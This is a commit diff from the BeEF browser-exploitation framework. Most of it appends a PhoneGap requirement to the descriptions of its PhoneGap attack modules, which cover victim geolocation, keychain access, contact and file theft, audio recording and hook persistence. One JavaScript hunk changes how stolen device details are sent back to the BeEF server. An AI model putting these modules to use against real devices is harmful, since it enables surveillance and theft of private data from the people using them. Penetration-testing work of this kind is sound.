Water is wet
This commit is contained in:
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Beep"
|
||||
description: "Make the phone beep"
|
||||
description: "Make the phone beep. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Check Connection"
|
||||
description: "Find out the network connection type e.g. Wifi, 3G."
|
||||
description: "Find out the network connection type e.g. Wifi, 3G. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -19,10 +19,8 @@ beef.execute(function() {
|
||||
+ " uuid: " + device.uuid
|
||||
+ " version: " + device.version
|
||||
+ " model: " + device.model;
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "phonegap=" + phonegap_details, beef.are.status_success());
|
||||
} catch(e) {
|
||||
phonegap_details = "unable to detect phonegap";
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unable to detect phonegap", beef.are.status_error());
|
||||
}
|
||||
|
||||
beef.net.send("<%= @command_url %>", <%= @command_id %>, "phonegap="+phonegap_details);
|
||||
|
||||
});
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Upload File"
|
||||
description: "Upload files from device to a server of your choice."
|
||||
description: "Upload files from device to a server of your choice. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Geolocation"
|
||||
description: "Geo locate your victim."
|
||||
description: "Geo locate your victim. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Globalization Status"
|
||||
description: "Examine device local settings"
|
||||
description: "Examine device local settings. This module requires the PhoneGap API."
|
||||
authors: ["staregate"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Keychain"
|
||||
description: "Read/CreateUpdate/Delete Keychain Elements"
|
||||
description: "Read/CreateUpdate/Delete Keychain Elements. This module requires the PhoneGap API."
|
||||
authors: ["staregate"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "List Contacts"
|
||||
description: "Examine device contacts."
|
||||
description: "Examine device contacts. This module requires the PhoneGap API."
|
||||
authors: ["staregate"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "List Files"
|
||||
description: "Examine device file system."
|
||||
description: "Examine device file system. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Persist resume"
|
||||
description: "Persist over applications sleep/wake events"
|
||||
description: "Persist over applications sleep/wake events. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Persistence"
|
||||
description: "Insert the BeEF hook into PhoneGap's index.html (iPhone only)"
|
||||
description: "Insert the BeEF hook into PhoneGap's index.html (iPhone only). This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "List Plugins"
|
||||
description: "Attempts to guess installed plugins."
|
||||
description: "Attempts to guess installed plugins. This module requires the PhoneGap API."
|
||||
authors: ["staregate"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Prompt User"
|
||||
description: "Ask device user a question"
|
||||
description: "Ask device user a question. This module requires the PhoneGap API."
|
||||
authors: ["staregate"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Start Recording Audio"
|
||||
description: "Start recording audio."
|
||||
description: "Start recording audio. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
@@ -11,7 +11,7 @@ beef:
|
||||
enable: true
|
||||
category: "Phonegap"
|
||||
name: "Stop Recording Audio"
|
||||
description: "Stop recording audio."
|
||||
description: "Stop recording audio. This module requires the PhoneGap API."
|
||||
authors: ["mh"]
|
||||
target:
|
||||
working: ["All"]
|
||||
|
||||
Reference in New Issue
Block a user